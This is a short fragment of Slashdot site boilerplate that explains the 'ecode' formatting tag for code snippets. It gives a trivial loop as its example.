  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>
Create a Slashdot Account

Loading...